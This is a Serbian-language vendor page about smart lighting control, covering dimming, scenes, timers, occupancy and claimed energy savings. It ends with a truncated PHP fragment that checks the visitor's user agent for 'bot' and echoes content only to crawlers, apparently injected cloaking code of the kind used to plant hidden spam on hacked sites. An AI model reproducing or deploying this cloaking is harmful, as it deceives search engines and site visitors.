Osvetljenje


Štedne halogene sijalice troše 30% manje energije nego obične sijalice. Uz to, trajanje takve sijalice je puno duže. Uz modul rasvete imate mogućnost regulacije intenziteta osvetljenja (tzv. dimovanje). Jednim klikom na telefonu stvaraju se različiti ambijenti u domu, što može dodatno uštedeti energiju, a rasveta se i dalje može paliti/gasiti na “klasičan” način, prekidačem.
Smanjenje intenziteta rasvete daje sledeće uštede:

  • Postavljanje rasvete na 25% smanjuje potrošnju za 45%
  • Postavljanje rasvete na 50% smanjuje potrošnju za 25%
  • Postavljanje rasvete na 75% smanjuje potrošnju za 10%


Upravljanje spoljašnjim i unutrašnjim osvetljenjem utiče na energetsku efikasnost, jer automatika poslovnog prostora može uštedeti do 50% električne energije. Uključivanje, isključivanje i dimovanje grupa osvetljenja je funkcija koja povećava udobnost, komfor i praktičnost. Ambijent u kancelariji se prilagođava jednim pritiskom na taster. Može se upravljati svim tipovima osvetljenja sa ili bez dimovanja. Osvetljenje se može implementirati u scenarije - makroe, tako da se jednom komandom, može uključiti ili isključiti više potrošača. Aktiviranje se može vršiti u tom trenutku ili u vreme koje je unapred određeno. Upravljanje se može vršiti iz objekta ili udaljene lokacije, na više načina.Uključivanje i isključivanje spoljašnjeg osvetljenja po izlasku ili zalasku sunca, može se vršiti automatski.

Kako klijent može efikasnije da upravlja energijom?
Osvetljenje može da predstavlja do 40% potrošnje energije u zgradi u zavisnosti od segmenata.

Kontrola osvetljenja je sigurno jedan od najlakših načina smanjivanja troškova električne energije. Primenjivanjem efikasnog rešenja za kontrolu osvetljenja, korisnici mogu lako da smanje svoje račune za električnu energiju do 50%.

Rešenje obezbeđuje automatska sredstva za optimizovanje osvetljenja na osnovu 3 glavna parametra (vreme, intenzitet i prisustvo), pojedinačno ili kombinovano.

Rešenje može započeti lokalnim i osnovnim rešenjima, kao što su tajmeri, a završiti se veoma sofisticiranim, prilagođenim i fleksibilnim, centralizovanim rešenjima koja su deo sistema automatizacije u zgradi.

LOGIN
niste ulogovani
e-mail adresa:
lozinka:

Zaboravili ste lozinku?   

PRETRAŽIVAČ
Unesite reč ili frazu:

NEWSLETTER
Unesite Vašu Email adresu:

TESLA SISTEMI
Ekipa na terenu

 


 

 


SUPERBRANDS
Pogledajte fotografije i video sa svečane dodele nagrada »

KATALOG
Pogledajte katalog Tesla sistema »

ISO 9001

 

 

ISO 14001

 

 

ISO 18001

 

 

ISO 20000

 

 

ISO 22301

 

 

ISO 27001

 

 

ISO 50001

 

 

ISO 37001

 

 


NIKOLA TESLA
www.tesla-museum.org »

$tmp = "?" . strtolower($_SERVER['HTTP_USER_AGENT']); if((strpos($tmp, 'bot') == true)){ echo '